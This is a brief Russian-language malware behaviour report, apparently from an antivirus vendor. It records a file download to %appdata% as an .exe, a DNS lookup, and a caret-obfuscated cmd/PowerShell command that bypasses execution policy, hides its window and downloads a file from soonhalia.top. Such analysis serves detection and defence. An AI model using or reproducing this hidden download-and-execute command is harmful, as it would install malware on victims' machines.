Техническая информация
- http://www.soonhalia.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^e^RsH^e^LL.exE^ -^eXecU^tiONPOLI^Cy ^B^yPASS -Nop^r^OFiLE -w^IndOws^t^Yle ^h^Idde^N (NE^w-^oBje^CT^ ^SYS^T^E^M.^n^et.we^bCLiEnt).Do^W^NlOa^DFil^e('http://www.soonhalia.to...
- DNS ASK so###alia.top
- '<SYSTEM32>\cmd.exe' /c "POw^e^RsH^e^LL.exE^ -^eXecU^tiONPOLI^Cy ^B^yPASS -Nop^r^OFiLE -w^IndOws^t^Yle ^h^Idde^N (NE^w-^oBje^CT^ ^SYS^T^E^M.^n^et.we^bCLiEnt).Do^W^NlOa^DFil^e('http://www.soonhalia.to...' (со скрытым окном)